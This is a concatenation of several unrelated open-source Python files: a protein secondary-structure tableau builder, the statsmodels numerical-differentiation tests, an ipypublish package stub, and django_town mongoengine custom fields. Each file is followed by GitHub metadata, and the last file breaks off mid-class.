    """
    Return SSE axis midpoint distance matrix by calling function
    in ptdistmatrix.py

    Parameters:
         pdbid - PDB identifier of the structure
         domain - The PTDomain object for our current domain
         ptnode_list - list of PTNodes (in sequence order, but not
                       necessarily contiguous) to build the matrix for,
                       or None to use all nodes in domain.
                       Default None.

    Return value: Numeric.array SSE midpoint distance matrix.

    Uses data members:
      (readonly):
        chain_dict - dict { chainid : ptnode_list } of nodes in chains
        pdb_struct - Bio.PDB parsed PDB structure
    """
    if ptnode_list is None:
        # Build list of all helix and strand PTNodes
        # (iter_chains() yields only the nodes in our domain)
        ptnode_list = [node
                       for nodelist in self.iter_chains()
                       for node in nodelist
                       if not isinstance(node, PTNodeTerminus)]
    return compute_sse_midpoint_dist_matrix(ptnode_list, self.pdb_struct)
#-----------------------------------------------------------------------------
#
# Function definitions
#
#-----------------------------------------------------------------------------
def make_tableaux(pdb_filename,
                  pdb_struct,
                  secstruct_program,
                  domain_program,
                  include_310_helices = False,
                  include_pi_helices = False,
                  use_numeric = False,
                  sse_id_list = None,
                  use_hk = False,
                  min_sse_len = None,
                  build_dist_matrix = False,
                  chainid = None,
                  domainid = None):
    """
    For the supplied filename, read PDB format data from that file
    and create tableaux or SSE distance matrix for that structure.

    This function is called by get_tableaux() (below), which handles
    compressed files etc.

    Note: for multi-domains, will be multiple output tableaux, one for
    each domain.

    Parameters:
       pdb_filename - filename of PDB file to read
       pdb_struct - Bio.PDB parsed PDB structure
       secstruct_program - secondary structure definition program
                       ('stride' or 'dssp' or 'pdb' or 'pmml') to use.
       domain_program - domain decomposition method ('ddomain','cath', etc.)
       include_310_helices - if True, include 3_10 helices in the graph
       include_pi_helices - if True, include pi helices in the graph
       use_numeric - If True, use numeric matrix rather than tableau
       sse_id_list - list of ints representing SSE sequential id numbers
                     to include in tableau. Default None.
                     When None, all SSEs are included.
       use_hk - If True, use HH and KK codes for strands.
       min_sse_len - if not None, the minimum length of SSE to include
                     in tableau.
       build_dist_matrix - If True, build SSE midpoint distance matrix
                     instead of tableau.
       chainid - If not None, only build tableau for that chain id.
       domainid - If not None, only build tableau for that domain id.

    Return value: tuple (tableaux_list, sse_string_list)
                  where tableaux_list is
                  list of tableaux (only one in list unless domain decomp
                  is used and finds multiple domains);
                  or list of omega matrices (Numeric.array) if use_numeric
                  is True
                  or list of SSE axis midpoint distance matrices
                  (Numeric.array) if build_dist_matrix is True
                  and
                  sse_string_list is SSE string description e.g. 'EEHHE' etc.
    """
    (pdbid,suffix) = os.path.splitext(os.path.basename(pdb_filename))
    pdbid = pdbid.upper()
    if len(pdbid) >= 6 and pdbid[:3] == "PDB":
        pdbid = pdbid[3:7]  # e.g. "PDB1QLP.ENT" -> "1QLP"

    if secstruct_program == "pdb":
        secstruct = ptsecstruct.read_secstruct_from_pdb_file(pdb_filename)
        if secstruct is not None:
            secstruct.pdb_header = pdb_struct.header['head']
        else:
            # HELIX/SHEET cards unusable: fall back to DSSP
            secstruct_program = "dssp"
            sys.stderr.write('WARNING: error with HELIX or SHEET cards in PDB'
                             ': ' + secstruct_program +
                             ' will be used instead\n')
    else:
        secstruct = None

    if secstruct is None:
        # read secondary structure information from STRIDE or DSSP
        if secstruct_program == "stride":
            secstruct = ptsecstruct.read_secstruct_from_stride(pdb_filename)
        elif secstruct_program == "dssp":
            secstruct = ptsecstruct.read_secstruct_from_dssp(pdb_filename)
        elif secstruct_program == "pmml":
            secstruct = ptsecstruct.read_secstruct_from_pmml(pdb_filename)
        else:
            assert(False)

    if domain_program is not None:
        domain_list = getdomains.get_domains(domain_program,
                                             pdbid, pdb_filename, pdb_struct)
    else:
        domain_list = [PTDomain(None, None)] # one-domain protein, no further info

    # for SSEs that cross domain boundaries, move whole SSE to one of the domains
    fixup_crossdomain_sses(secstruct, domain_list)

    tableaux_list = []  # NB may be list of PTTableau or list of Numeric.array
    sse_str_list = []
    for domain in domain_list:
        if domainid and domain.domainid != domainid:
            if verbose:
                sys.stderr.write("skipped domainid " + domainid + "\n")
            continue

        ptg = TableauBuild(pdb_struct, pdbid,
                           include_310_helices, include_pi_helices)
        # build tableaubuild object from secondary structure
        if secstruct_program == "pmml":
            ignore_insertion_codes = True  # PMML does not report them
        else:
            ignore_insertion_codes = False
        try:
            ptg.build_graph_from_secstruct(secstruct, domain, chainid,
                                           ignore_insertion_codes)
        except NoSSE_Exception:
            if chainid:
                sys.stderr.write('WARNING: No helices or strands found in ' +
                                 pdbid +
                                 ' chain ' + chainid +
                                 ': skipping\n')
            else:
                sys.stderr.write('WARNING: No helices or strands found in ' +
                                 pdbid +
                                 ': skipping\n')
            continue
        except ValueError:
            # PTNode.__init__ raises ValueError if end_res_seq < start_res_seq.
            # This happens on e.g. d1dkia_.ent when using PMML (only)
            # as PMML does not handle insertion codes so we end up with
            # residue numbers all wrong. Nothing we can do with this much of
            # a mess, just give up.
            sys.stderr.write('ERROR: out of order residue numbers in ' +
                             pdbid + ', probably due to insertino codes ' +
                             'not workin in pmml: skipping this structure\n')
            continue

        if use_hk:  # only need to know sheets if using HH and KK codes
            if secstruct_program == "pmml":
                sys.stderr.write('WARNING: PMML has no hbond or bridge information, cannot label sheets for HH and KK codes\n')
            # NOTE(review): label_sheets() still runs for pmml input; it is
            # harmless without bridge information (produces no sheets)
            ptg.label_sheets()

        if verbose:
            for nodelist in ptg.iter_chains():
                for node in nodelist:
                    sys.stderr.write(str(node) + '\n')

        # if list of int SSE sequential ids supplied, convert to list of
        # PTNode objects
        if sse_id_list:
            try:
                ptnode_list = [ptg.seqnum2node[sse_id]
                               for sse_id in sse_id_list]
            except KeyError as k:  # 'as' form works in Python 2.6+ and 3
                sys.stderr.write("SSE sequential id " + str(k)
                                 + " does not exist\n")
                sys.exit(1)
        else:
            ptnode_list = None

        if not ptnode_list:
            # Build list of all helix and strand PTNodes with len >= min_sse_len
            ptnode_list = []
            for nodelist in ptg.iter_chains():
                for node in nodelist: # these nodes are only those in our domain
                    if (not isinstance(node, PTNodeTerminus)): # not terminii
                        ptnode_list.append(node)
        if min_sse_len:
            ptnode_list = [node for node in ptnode_list
                           if node.get_span() >= min_sse_len]

        if build_dist_matrix:
            dist_matrix = ptg.build_sse_dist_matrix(pdbid, domain, ptnode_list)
            tableaux_list.append(dist_matrix)
        elif use_numeric:
            Omega = ptg.build_omega_matrix(pdbid, domain, ptnode_list)
            tableaux_list.append(Omega)
        else:
            ptg.build_tableau(pdbid, domain, ptnode_list, use_hk)
            tableaux_list.append(ptg.tableau)

        # SSE string description, one char per node: E = strand, H = helix
        sse_str = ""
        for node in ptnode_list:
            if isinstance(node, PTNodeStrand):
                sse_str += 'E'
            elif isinstance(node, PTNodeHelix):
                sse_str += 'H'
            else:
                raise ValueError('bad node type ' + str(node))
        sse_str_list.append(sse_str)

    return (tableaux_list, sse_str_list)
def get_tableaux(pdb_filename,
                 secstruct_program = 'dssp',
                 domain_program = 'none',
                 include_310_helices = True,
                 include_pi_helices = True,
                 sse_id_list = None,
                 min_sse_len = None,
                 use_numeric = False,
                 use_hk = False,
                 build_dist_matrix = False):
    """
    Get a tableau for a single PDB or ASTRAL pdb-style file
    (compressed files e.g. pdb1qlp.ent.gz) or uncompressed
    or the ASTRAL pdb-style hierarchy
    (uncompressed files e.g. d1qlpa_.ent).

    Parameters:
       pdb_filename - filename of PDB or ASTRAL pdb-style file, as above.
       secstruct_program - secondary structure definition program
                       ('stride' or 'dssp' or 'pdb') to use.
       domain_program - domain decomposition method ('ddomain','cath', etc.)
       include_310_helices - if True, include 3_10 helices in the graph
       include_pi_helices - if True, include pi helices in the graph
       sse_id_list - list of ints representing SSE sequential id numbers
                     to include in tableau. Default None.
                     When None, all SSEs are included.
       min_sse_len - min number of residues in SSE to be included.
                     Default None (no min length).
       use_numeric - if True build Numeric.array Omega matrix not PTTableau
       use_hk - If True build tableaux with HH and KK codes for strands in
                same sheet. default False.
       build_dist_matrix - If True, build SSE midpoint distance matrices
                           instead of tableaux.

    Return value:
        tuple (pdbid, tableaux_list, sse_string_list)
        from the pdb file, only one in lists unless
        domain decomposition is used and finds multidomains in input.
        tableaux_list is list of tableaux or omega matrices
        sse_string_list is SSE string description e.g. 'EEHHE' etc.
    """
    tableaux_list = []
    # Check for compressed files. We only support gzip (.gz).
    # The external secondary structure programs need the file
    # uncompressed on disk, so decompress into a temporary directory.
    pdb_file_basename = os.path.basename(pdb_filename)
    (name,extension) = os.path.splitext(pdb_file_basename)
    if extension == '.gz':
        # local imports: only needed on this branch
        import gzip
        import shutil
        import tempfile
        # tempfile.mkdtemp creates the directory securely; the old
        # os.tempnam()+os.mkdir() combination was racy and os.tempnam
        # no longer exists in Python 3
        TMPDIR = tempfile.mkdtemp(prefix="ptgz")
        tmp_pdbfilename = os.path.join(TMPDIR, name)
        # decompress with the stdlib gzip module instead of
        # os.system("gzip ..."): no shell quoting/injection problems
        # with unusual filenames
        gzfile = gzip.open(pdb_filename, 'rb')
        try:
            outfile = open(tmp_pdbfilename, 'wb')
            try:
                shutil.copyfileobj(gzfile, outfile)
            finally:
                outfile.close()
        finally:
            gzfile.close()
        our_pdb_filename = tmp_pdbfilename
        used_tmp_file = True
    else:
        our_pdb_filename = pdb_filename
        used_tmp_file = False

    try:
        pdbid = name
        if len(pdbid) >= 6 and pdbid[:3].upper() == "PDB":
            pdbid = pdbid[3:7].upper()
        # parse PDB file
        pdb_parser = PDBParser()
        pdb_struct = pdb_parser.get_structure(pdbid, our_pdb_filename)
        # create the Tableaux and output them
        (tableaux_list, sse_string_list) = make_tableaux(our_pdb_filename,
                                                         pdb_struct,
                                                         secstruct_program,
                                                         domain_program,
                                                         include_310_helices,
                                                         include_pi_helices,
                                                         use_numeric,
                                                         sse_id_list,
                                                         use_hk,
                                                         min_sse_len,
                                                         build_dist_matrix)
    finally:
        # always remove the temporary uncompressed copy
        if used_tmp_file:
            cleanup_tmpdir(TMPDIR)
    return (pdbid, tableaux_list, sse_string_list)
| {
"content_hash": "5df76ef612fa5e321f4f2a9ccd5a4edb",
"timestamp": "",
"source": "github",
"line_count": 1102,
"max_line_length": 127,
"avg_line_length": 42.6442831215971,
"alnum_prop": 0.5378558964974252,
"repo_name": "NirBenTalLab/proorigami-ptgraph",
"id": "554f580cedaaaca39697f7eccae0467ed0eac2fd",
"size": "47389",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tableaubuild.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1151802"
},
{
"name": "Shell",
"bytes": "39242"
}
],
"symlink_target": ""
} |
'''Testing numerical differentiation

Still some problems with the API (args tuple versus *args).
The finite-difference Hessian has some problems that I haven't looked at yet.
Should the Hessian also work per observation, if fun returns 2d?

'''
from __future__ import print_function
import numpy as np
from numpy.testing import assert_almost_equal, assert_allclose
import statsmodels.api as sm
from statsmodels.tools import numdiff
from statsmodels.tools.numdiff import (approx_fprime, approx_fprime_cs,
approx_hess_cs)
DEC3 = 3
DEC4 = 4
DEC5 = 5
DEC6 = 6
DEC8 = 8
DEC13 = 13
DEC14 = 14
def maxabs(x, y):
    """Largest absolute elementwise difference between x and y."""
    return np.abs(x - y).max()
def fun(beta, x):
    """Linear predictor x.dot(beta), summed over observations (axis 0)."""
    return np.dot(x, beta).sum(0)
def fun1(beta, y, x):
    """Per-observation squared residuals (y - x.dot(beta))**2."""
    #print(beta.shape, x.shape)
    resid = y - np.dot(x, beta)
    return resid ** 2  #(xb-xb.mean(0))**2

def fun2(beta, y, x):
    """Sum of squared residuals: fun1 aggregated over observations."""
    #print(beta.shape, x.shape)
    return fun1(beta, y, x).sum(0)
#ravel() added because of MNLogit 2d params
class CheckGradLoglikeMixin(object):
    """Mixin comparing a model's analytic score/hessian with numerical
    differentiation of its loglike.

    Subclasses must set ``self.mod`` (the model instance) and
    ``self.params`` (a list of parameter arrays to evaluate at).
    """
    def test_score(self):
        # analytic score vs forward-difference and complex-step gradients
        for test_params in self.params:
            sc = self.mod.score(test_params)
            scfd = numdiff.approx_fprime(test_params.ravel(),
                                         self.mod.loglike)
            assert_almost_equal(sc, scfd, decimal=1)

            sccs = numdiff.approx_fprime_cs(test_params.ravel(),
                                            self.mod.loglike)
            assert_almost_equal(sc, sccs, decimal=11)

    def test_hess(self):
        # analytic hessian vs several finite-difference / complex-step
        # approximations, at varying (documented) precision levels
        for test_params in self.params:
            he = self.mod.hessian(test_params)
            hefd = numdiff.approx_fprime_cs(test_params, self.mod.score)
            assert_almost_equal(he, hefd, decimal=DEC8)

            #NOTE: notice the accuracy below
            assert_almost_equal(he, hefd, decimal=7)

            hefd = numdiff.approx_fprime(test_params, self.mod.score,
                                         centered=True)
            assert_allclose(he, hefd, rtol=5e-10)
            hefd = numdiff.approx_fprime(test_params, self.mod.score,
                                         centered=False)
            assert_almost_equal(he, hefd, decimal=4)
            hescs = numdiff.approx_fprime_cs(test_params.ravel(),
                                             self.mod.score)
            assert_allclose(he, hescs, rtol=1e-13)

            hecs = numdiff.approx_hess_cs(test_params.ravel(),
                                          self.mod.loglike)
            assert_allclose(he, hecs, rtol=1e-9)

            #NOTE: Look at the lack of precision - default epsilon not always
            #best
            grad = self.mod.score(test_params)
            hecs, gradcs = numdiff.approx_hess1(test_params, self.mod.loglike,
                                                1e-6, return_grad=True)
            assert_almost_equal(he, hecs, decimal=1)
            assert_almost_equal(grad, gradcs, decimal=1)
            hecs, gradcs = numdiff.approx_hess2(test_params, self.mod.loglike,
                                                1e-4, return_grad=True)
            assert_almost_equal(he, hecs, decimal=3)
            assert_almost_equal(grad, gradcs, decimal=1)
            hecs = numdiff.approx_hess3(test_params, self.mod.loglike, 1e-5)
            assert_almost_equal(he, hecs, decimal=4)
class TestGradMNLogit(CheckGradLoglikeMixin):
    """Score/Hessian derivative checks for MNLogit on the anes96 data."""
    def __init__(self):
        #from .results.results_discrete import Anes
        data = sm.datasets.anes96.load()
        exog = data.exog
        exog = sm.add_constant(exog, prepend=False)
        self.mod = sm.MNLogit(data.endog, exog)

        #def loglikeflat(self, params):
            #reshapes flattened params
        #    return self.loglike(params.reshape(6,6))
        #self.mod.loglike = loglikeflat  #need instance method
        #self.params = [np.ones((6,6)).ravel()]
        # evaluate at the MLE; MNLogit params are 2d, flattened
        # Fortran-order (column-major)
        res = self.mod.fit(disp=0)
        self.params = [res.params.ravel('F')]

    def test_hess(self):
        #NOTE: I had to overwrite this to lessen the tolerance
        for test_params in self.params:
            he = self.mod.hessian(test_params)
            hefd = numdiff.approx_fprime_cs(test_params, self.mod.score)
            assert_almost_equal(he, hefd, decimal=DEC8)

            #NOTE: notice the accuracy below and the epsilon changes
            # this doesn't work well for score -> hessian with non-cs step
            # it's a little better around the optimum
            assert_almost_equal(he, hefd, decimal=7)
            hefd = numdiff.approx_fprime(test_params, self.mod.score,
                                         centered=True)
            assert_almost_equal(he, hefd, decimal=4)
            hefd = numdiff.approx_fprime(test_params, self.mod.score, 1e-9,
                                         centered=False)
            assert_almost_equal(he, hefd, decimal=2)

            hescs = numdiff.approx_fprime_cs(test_params, self.mod.score)
            assert_almost_equal(he, hescs, decimal=DEC8)

            hecs = numdiff.approx_hess_cs(test_params, self.mod.loglike)
            assert_almost_equal(he, hecs, decimal=5)
            #NOTE: these just don't work well
            #hecs = numdiff.approx_hess1(test_params, self.mod.loglike, 1e-3)
            #assert_almost_equal(he, hecs, decimal=1)
            #hecs = numdiff.approx_hess2(test_params, self.mod.loglike, 1e-4)
            #assert_almost_equal(he, hecs, decimal=0)
            hecs = numdiff.approx_hess3(test_params, self.mod.loglike, 1e-4)
            assert_almost_equal(he, hecs, decimal=0)
class TestGradLogit(CheckGradLoglikeMixin):
    """Score/Hessian derivative checks for Logit on the spector data."""
    def __init__(self):
        data = sm.datasets.spector.load()
        data.exog = sm.add_constant(data.exog, prepend=False)
        self.mod = sm.Logit(data.endog, data.exog)
        # fixed parameter vector away from the optimum; no fit needed
        # for the derivative checks in the mixin
        self.params = [np.array([1, 0.25, 1.4, -7])]
class CheckDerivativeMixin(object):
    """Mixin checking numdiff gradients/Hessians of a function against
    analytic values on a small random linear-model dataset.

    Subclasses implement init() (sets self.params and self.args),
    fun(), gradtrue(params) and hesstrue(params); hesstrue may return
    None to skip the Hessian checks.
    """
    def __init__(self):
        # build the shared random dataset: y = x.dot(beta) + noise
        nobs = 200
        #x = np.arange(nobs*3).reshape(nobs,-1)
        np.random.seed(187678)
        x = np.random.randn(nobs,3)
        xk = np.array([1,2,3])
        xk = np.array([1.,1.,1.])
        #xk = np.zeros(3)
        beta = xk
        y = np.dot(x, beta) + 0.1*np.random.randn(nobs)
        xkols = np.dot(np.linalg.pinv(x),y)  # OLS estimate

        self.x = x
        self.y = y
        # evaluate derivatives both at a fixed point and at the OLS solution
        self.params = [np.array([1.,1.,1.]), xkols]
        self.init()

    def init(self):
        # hook for subclasses; default does nothing
        pass

    def test_grad_fun1_fd(self):
        # average of forward and backward differences (= central difference)
        for test_params in self.params:
            #gtrue = self.x.sum(0)
            gtrue = self.gradtrue(test_params)
            fun = self.fun()

            epsilon = 1e-6
            gfd = numdiff.approx_fprime(test_params, fun, epsilon=epsilon,
                                         args=self.args)
            gfd += numdiff.approx_fprime(test_params, fun, epsilon=-epsilon,
                                         args=self.args)
            gfd /= 2.
            assert_almost_equal(gtrue, gfd, decimal=DEC6)

    def test_grad_fun1_fdc(self):
        # centered finite difference with a smaller step
        for test_params in self.params:
            #gtrue = self.x.sum(0)
            gtrue = self.gradtrue(test_params)
            fun = self.fun()

            epsilon = 1e-6  #default epsilon 1e-6 is not precise enough
            gfd = numdiff.approx_fprime(test_params, fun, epsilon=1e-8,
                                        args=self.args, centered=True)
            assert_almost_equal(gtrue, gfd, decimal=DEC5)

    def test_grad_fun1_cs(self):
        # complex-step derivative: accurate to near machine precision
        for test_params in self.params:
            #gtrue = self.x.sum(0)
            gtrue = self.gradtrue(test_params)
            fun = self.fun()

            gcs = numdiff.approx_fprime_cs(test_params, fun, args=self.args)
            assert_almost_equal(gtrue, gcs, decimal=DEC13)

    def test_hess_fun1_fd(self):
        # finite-difference Hessians (three variants)
        for test_params in self.params:
            #hetrue = 0
            hetrue = self.hesstrue(test_params)
            if not hetrue is None: #Hessian doesn't work for 2d return of fun
                fun = self.fun()
                #default works, epsilon 1e-6 or 1e-8 is not precise enough
                hefd = numdiff.approx_hess1(test_params, fun, #epsilon=1e-8,
                                            args=self.args)
                #TODO:should be kwds
                assert_almost_equal(hetrue, hefd, decimal=DEC3)
                #TODO: I reduced precision to DEC3 from DEC4 because of
                # TestDerivativeFun
                hefd = numdiff.approx_hess2(test_params, fun, #epsilon=1e-8,
                                            args=self.args)
                #TODO:should be kwds
                assert_almost_equal(hetrue, hefd, decimal=DEC3)
                hefd = numdiff.approx_hess3(test_params, fun, #epsilon=1e-8,
                                            args=self.args)
                #TODO:should be kwds
                assert_almost_equal(hetrue, hefd, decimal=DEC3)

    def test_hess_fun1_cs(self):
        # complex-step Hessian
        for test_params in self.params:
            #hetrue = 0
            hetrue = self.hesstrue(test_params)
            if not hetrue is None: #Hessian doesn't work for 2d return of fun
                fun = self.fun()
                hecs = numdiff.approx_hess_cs(test_params, fun, args=self.args)
                assert_almost_equal(hetrue, hecs, decimal=DEC6)
class TestDerivativeFun(CheckDerivativeMixin):
    """Derivative checks for fun (summed linear predictor)."""
    def init(self):
        ols_params = np.dot(np.linalg.pinv(self.x), self.y)
        self.params = [np.array([1., 1., 1.]), ols_params]
        self.args = (self.x,)

    def fun(self):
        # module-level fun, not this method
        return fun

    def gradtrue(self, params):
        # gradient of sum(x.dot(beta)) w.r.t. beta: column sums of x
        return self.x.sum(0)

    def hesstrue(self, params):
        # linear function, so the Hessian is identically zero;
        # shaped (3,3) because the test fails with a scalar 0
        return np.zeros((3,3))
#why is precision only DEC3
class TestDerivativeFun2(CheckDerivativeMixin):
    """Derivative checks for fun2 (sum of squared residuals)."""
    def init(self):
        ols_params = np.dot(np.linalg.pinv(self.x), self.y)
        self.params = [np.array([1., 1., 1.]), ols_params]
        self.args = (self.y, self.x)

    def fun(self):
        # module-level fun2, not a method
        return fun2

    def gradtrue(self, params):
        y, x = self.y, self.x
        # d/dbeta sum((y - x.dot(beta))**2) = -2 * x' (y - x.dot(beta))
        resid = y - np.dot(x, params)
        return (-x * 2 * resid[:, None]).sum(0)
        #2*(y-np.dot(x, params)).sum(0)

    def hesstrue(self, params):
        # constant Hessian of the quadratic objective: 2 x'x
        x = self.x
        return 2 * np.dot(x.T, x)
class TestDerivativeFun1(CheckDerivativeMixin):
    """Derivative checks for fun1 (per-observation squared residuals)."""
    def init(self):
        xkols = np.dot(np.linalg.pinv(self.x), self.y)
        self.params = [np.array([1.,1.,1.]), xkols]
        self.args = (self.y, self.x)

    def fun(self):
        # module-level fun1, not a method
        return fun1

    def gradtrue(self, params):
        y, x = self.y, self.x
        # Jacobian of the per-observation squared residuals
        return (-x*2*(y-np.dot(x, params))[:,None])

    def hesstrue(self, params):
        # fun1 returns a 2d array, for which the Hessian helpers are not
        # supported; returning None makes CheckDerivativeMixin skip the
        # Hessian checks.  (Removed unreachable code that followed the
        # return in the original.)
        return None
if __name__ == '__main__':
    # Ad hoc exploratory checks when run as a script; the test classes
    # above cover the same ground systematically.
    epsilon = 1e-6
    nobs = 200
    x = np.arange(nobs*3).reshape(nobs,-1)
    x = np.random.randn(nobs,3)  # overwrites the arange version above
    xk = np.array([1,2,3])
    xk = np.array([1.,1.,1.])
    #xk = np.zeros(3)
    beta = xk
    y = np.dot(x, beta) + 0.1*np.random.randn(nobs)
    xkols = np.dot(np.linalg.pinv(x),y)  # OLS estimate

    # gradient of fun: forward difference vs analytic (column sums of x)
    print(approx_fprime((1,2,3),fun,epsilon,x))
    gradtrue = x.sum(0)
    print(x.sum(0))
    # complex-step gradient
    gradcs = approx_fprime_cs((1,2,3), fun, (x,), h=1.0e-20)
    print(gradcs, maxabs(gradcs, gradtrue))
    print(approx_hess_cs((1,2,3), fun, (x,), h=1.0e-20)) #this is correctly zero

    # Hessian of fun2 vs analytic 2*x'x
    print(approx_hess_cs((1,2,3), fun2, (y,x), h=1.0e-20)-2*np.dot(x.T, x))
    print(numdiff.approx_hess(xk,fun2,1e-3, (y,x))[0] - 2*np.dot(x.T, x))

    # Jacobian of per-observation fun1
    gt = (-x*2*(y-np.dot(x, [1,2,3]))[:,None])
    g = approx_fprime_cs((1,2,3), fun1, (y,x), h=1.0e-20)#.T  #this shouldn't be transposed
    gd = numdiff.approx_fprime((1,2,3),fun1,epsilon,(y,x))
    print(maxabs(g, gt))
    print(maxabs(gd, gt))

    # derivative checks on a real model (Logit, spector data)
    import statsmodels.api as sm

    data = sm.datasets.spector.load()
    data.exog = sm.add_constant(data.exog, prepend=False)
    #mod = sm.Probit(data.endog, data.exog)
    mod = sm.Logit(data.endog, data.exog)
    #res = mod.fit(method="newton")
    test_params = [1,0.25,1.4,-7]
    loglike = mod.loglike
    score = mod.score
    hess = mod.hessian

    #cs doesn't work for Probit because special.ndtr doesn't support complex
    #maybe calculating ndtr for real and imag parts separately, if we need it
    #and if it still works in this case
    print('sm', score(test_params))
    print('fd', numdiff.approx_fprime(test_params,loglike,epsilon))
    print('cs', numdiff.approx_fprime_cs(test_params,loglike))
    print('sm', hess(test_params))
    print('fd', numdiff.approx_fprime(test_params,score,epsilon))
    print('cs', numdiff.approx_fprime_cs(test_params, score))

    #print('fd', numdiff.approx_hess(test_params, loglike, epsilon)) #TODO: bug
    '''
    Traceback (most recent call last):
      File "C:\Josef\eclipsegworkspace\statsmodels-josef-experimental-gsoc\scikits\statsmodels\sandbox\regression\test_numdiff.py", line 74, in <module>
        print('fd', numdiff.approx_hess(test_params, loglike, epsilon))
      File "C:\Josef\eclipsegworkspace\statsmodels-josef-experimental-gsoc\scikits\statsmodels\sandbox\regression\numdiff.py", line 118, in approx_hess
        xh = x + h
    TypeError: can only concatenate list (not "float") to list
    '''
    hesscs = numdiff.approx_hess_cs(test_params, loglike)
    print('cs', hesscs)
    print(maxabs(hess(test_params), hesscs))

    # smoke-fit some larger models (results unused beyond fitting)
    data = sm.datasets.anes96.load()
    exog = data.exog
    exog = sm.add_constant(exog, prepend=False)
    res1 = sm.MNLogit(data.endog, exog).fit(method="newton", disp=0)

    datap = sm.datasets.randhie.load()
    nobs = len(datap.endog)
    exogp = sm.add_constant(datap.exog.view(float).reshape(nobs,-1),
                            prepend=False)
    modp = sm.Poisson(datap.endog, exogp)
    resp = modp.fit(method='newton', disp=0)
| {
"content_hash": "037abc737275f6ea9bb25c28c9399cc6",
"timestamp": "",
"source": "github",
"line_count": 366,
"max_line_length": 152,
"avg_line_length": 38.5792349726776,
"alnum_prop": 0.5681303116147309,
"repo_name": "alekz112/statsmodels",
"id": "50e4c6e4bcf2fb9461115d83301b6ae3d7dcbe86",
"size": "14120",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "statsmodels/tools/tests/test_numdiff.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "AGS Script",
"bytes": "457842"
},
{
"name": "Assembly",
"bytes": "10509"
},
{
"name": "Batchfile",
"bytes": "351"
},
{
"name": "C",
"bytes": "12088"
},
{
"name": "HTML",
"bytes": "148470"
},
{
"name": "Python",
"bytes": "7888639"
},
{
"name": "R",
"bytes": "24111"
},
{
"name": "Stata",
"bytes": "26986"
}
],
"symlink_target": ""
} |
"""Container for CSS settings relevant to sphinx themes"""
| {
"content_hash": "9f8201677e5e3e23294f1edce16c6d5b",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 58,
"avg_line_length": 59,
"alnum_prop": 0.7627118644067796,
"repo_name": "chrisjsewell/ipypublish",
"id": "c8a2297297f2a253b5fb691017fb80086c68749b",
"size": "59",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "ipypublish/sphinx/notebook/css/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "4549"
},
{
"name": "CSS",
"bytes": "7275"
},
{
"name": "HTML",
"bytes": "7194717"
},
{
"name": "JavaScript",
"bytes": "2124646"
},
{
"name": "Jupyter Notebook",
"bytes": "1319557"
},
{
"name": "Makefile",
"bytes": "4666"
},
{
"name": "Python",
"bytes": "494303"
},
{
"name": "Shell",
"bytes": "552"
},
{
"name": "TeX",
"bytes": "267595"
}
],
"symlink_target": ""
} |
from mongoengine import IntField, StringField, DictField, ReferenceField
from django_town.utils import json
from django.utils.six import string_types
from django.db.models.loading import get_model
class OptionField(IntField):
    """IntField whose stored value is mapped through an (stored, display) option list.

    `option` is an iterable of (stored_value, display_value) pairs;
    to_mongo() stores the key for a display value, to_python() maps back.
    """
    def __init__(self, option=None, **kwargs):
        # Iterable of (stored, display) pairs used for both directions.
        self.option = option
        super(OptionField, self).__init__(**kwargs)
    def to_mongo(self, value):
        # Reverse lookup: display value -> stored value.
        lookup = {v: k for k, v in self.option}
        return lookup[value]
    def to_python(self, value):
        # Forward lookup: stored value -> display value; unknown values
        # pass through unchanged.
        lookup = {k: v for k, v in self.option}
        try:
            return lookup[value]
        except KeyError:
            return value
    def to_dict(self, value, serializer=None):
        return self.to_python(value)
    def validate(self, value):
        lookup = [v for k, v in self.option]
        if value in lookup:
            return
        # BUG FIX: the original called
        #   self.error('%s is not in [%s]' % value, ', '.join(...))
        # which both passed two positional args to error() and raised a
        # TypeError ("not enough arguments for format string") before the
        # validation error could ever be reported.
        self.error('%s is not in [%s]' % (value, ', '.join([str(each) for each in lookup])))
class ResourceField(StringField):
    """String-backed field that persists a resource by its primary key."""
    def __init__(self, resource, fields=None, **kwargs):
        # Resource class whose instances this field (de)serializes.
        self.resource = resource
        self.fields = fields
        super(ResourceField, self).__init__(**kwargs)
    def to_mongo(self, value):
        # Persist the primary key when handed a resource instance;
        # anything else is assumed to already be a raw pk.
        instance_cls = self.resource._meta.resource_instance_cls
        if isinstance(value, instance_cls):
            return value._pk
        return value
    def to_python(self, value):
        # Instances come back untouched; raw values are wrapped.
        instance_cls = self.resource._meta.resource_instance_cls
        if isinstance(value, instance_cls):
            return value
        return self.resource(value)
    def validate(self, value):
        # Only actual resource instances are considered valid.
        if not isinstance(value, self.resource._meta.resource_instance_cls):
            self.error('%s could not be converted to resource' % value)
class ResourceIntField(IntField):
    """Integer-backed variant of ResourceField: stores the resource pk as an int."""
    def __init__(self, resource, fields=None, **kwargs):
        self.resource = resource
        self.fields = fields
        super(ResourceIntField, self).__init__(**kwargs)
    def to_mongo(self, value):
        # Instances contribute their pk; raw values are coerced directly.
        instance_cls = self.resource._meta.resource_instance_cls
        raw = value._pk if isinstance(value, instance_cls) else value
        return int(raw)
    def to_python(self, value):
        instance_cls = self.resource._meta.resource_instance_cls
        if isinstance(value, instance_cls):
            return value
        return self.resource(value)
    def validate(self, value):
        # Intentionally permissive: non-instances pass silently
        # (the error call was commented out in the original).
        if isinstance(value, self.resource._meta.resource_instance_cls):
            return
        # self.error('%s could not be converted to resource' % value)
class ModelField(IntField):
    """Stores a Django model instance by its integer primary key."""
    def __init__(self, model, fields=None, **kwargs):
        # Accept either a model class or an "app.Model" string to resolve.
        if isinstance(model, string_types):
            model = get_model(model)
        self.model = model
        self.fields = fields
        super(ModelField, self).__init__(**kwargs)
    def to_mongo(self, value):
        raw = value.pk if isinstance(value, self.model) else value
        return int(raw)
    def to_python(self, value):
        if isinstance(value, self.model):
            return value
        # Raw value is treated as a pk and fetched through the ORM.
        return self.model.objects.get(pk=value)
    def validate(self, value):
        # Intentionally permissive: non-instances pass silently
        # (the error call was commented out in the original).
        if isinstance(value, self.model):
            return
        # self.error('%s could not be converted to resource' % value)
class DynamicResourceField(DictField):
    """Dict-backed field able to hold an instance of any of several resources.

